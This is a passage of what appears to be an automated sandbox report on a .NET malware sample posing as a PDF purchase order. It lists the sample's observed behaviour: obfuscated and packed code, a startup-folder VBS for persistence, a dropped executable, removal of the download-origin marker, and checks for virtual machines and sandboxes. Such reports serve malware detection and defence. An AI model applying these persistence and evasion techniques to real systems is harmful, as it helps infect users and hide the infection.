                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PO#83298373729383838392387373873PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PO#83298373729383838392387373873PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239876609.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239876609.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, I6AUjuY70VsUewGWtXT.cs.Net Code: Type.GetTypeFromHandle(fbwmFl4tVn0VOydup9E.HbCPjERgFK(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(fbwmFl4tVn0VOydup9E.HbCPjERgFK(16777252)),Type.GetTypeFromHandle(fbwmFl4tVn0VOydup9E.HbCPjERgFK(16777284))})
                    .NET source code contains potential unpacker
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.45893f0.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.45893f0.0.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.45893f0.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.45893f0.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.45893f0.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.6bd0000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.6cf0000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.4397590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2200782194.0000000002C1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2240298776.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2227430823.000000000419B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO#83298373729383838392387373873PDF.exe PID: 6500, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeCode function: 0_2_07511B3F push edi; retf 0_2_07511B46
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, KQieCq2hHNlWlPOCj3Y.csHigh entropy of concatenated method names: 'Rv4sNUPSIY', 'ep1291kRgjIhu7OomvN', 'EghwDHk8Ivl4FcTLmJd', 'MtNFTikjxkAlrn9405n', 'dab7Cik3SLdX5sbsJ6H'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, msOVci4lRABOCXCVrTa.csHigh entropy of concatenated method names: 'FXi4ZsS5C9', 'EHK4VTF8ux', 'z724pQUtmw', 'ziQ4iYPSeE', 'Pju4hNhLiQ', 'kiq4zSYUXu', 'ibk9yZZetZ', 'rq19qp2dqq', 'Vyv9fMEr16', 'lpD9MWxVaf'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'FAWZw37ASCT6OM5IXAL'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, NjZJBOUtBIO6Bj8InuJ.csHigh entropy of concatenated method names: 'zfwUkcyN5N', 'XAUUrlrllA', 'mmYU7HtmVC', 'G7uUlsBCtv', 'WPiUNPaCmT', 'pD3KWLno7xtjqNLa1ss', 'LGe3H1nJlQDcjYqyCI6', 'PXEEVHnahnb0iySc88S', 'GgBs1nntx6WNsYEm5qs', 'md58Dgnnn9aahhLSYGH'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, Dd1FosYbHJvWJT0kXb9.csHigh entropy of concatenated method names: 'p2lY5FuOmd', 'CCCYmKw6lO', 'k1utA3rhoBDpgsABuby', 'GDeujvrz7knygQBYCLi', 'G3uRFl7yxfqS9wdGGiW', 'VfN7SX7qJih3SRXdNe4', 'gmF2sj7fpwgdf19JJBg', 'E7ERFB7MSASCbTltt5l', 'FJLtGK7vhO6kZBwXeYF', 'LgukK87UVCik87k3FqJ'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, I6AUjuY70VsUewGWtXT.csHigh entropy of concatenated method names: 'bWEC3mlsNmeQUdFDqNP', 'oBl7TrlgDJg4laTPw4L', 'HjN4LNlsmE', 'RvRyWxl9WTAXspNVd17', 'dIEZspluAFw8XraNv13', 'scZtBdl1Z49gSAjBP7w', 'uMib7slxFMLSl1v6QjW', 'OrhBgvlLd0PTP0Uc594', 'chnHp8lEESodvcQXoHh', 'hca8XIlTVECOxeT2svm'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.3f8b190.1.raw.unpack, QfRRuY9vsfXIUM9p91g.csHigh entropy of concatenated method names: 'J7STAQE9ua', 'p3xTj5wmKT', 'VROT3dRAYe', 'c3HTGHkkjJ', 'rsITOkkq5T', 'zMUTo2jp7s', 'UVMTJgrosT', 'nwx96mobLe', 'E5kTaEFOPp', 'LmdTtjP37o'
                    Source: 0.2.PO#83298373729383838392387373873PDF.exe.66d0000.6.raw.unpack, KQieCq2hHNlWlPOCj3Y.csHigh entropy of concatenated method names: 'Rv4sNUPSIY', 'ep1291kRgjIhu7OomvN', 'EghwDHk8Ivl4FcTLmJd', 'MtNFTikjxkAlrn9405n', 'dab7Cik3SLdX5sbsJ6H'
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile created: C:\Users\user\AppData\Roaming\Directory.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbsJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbsJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: PO#83298373729383838392387373873PDF.exe PID: 6500, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
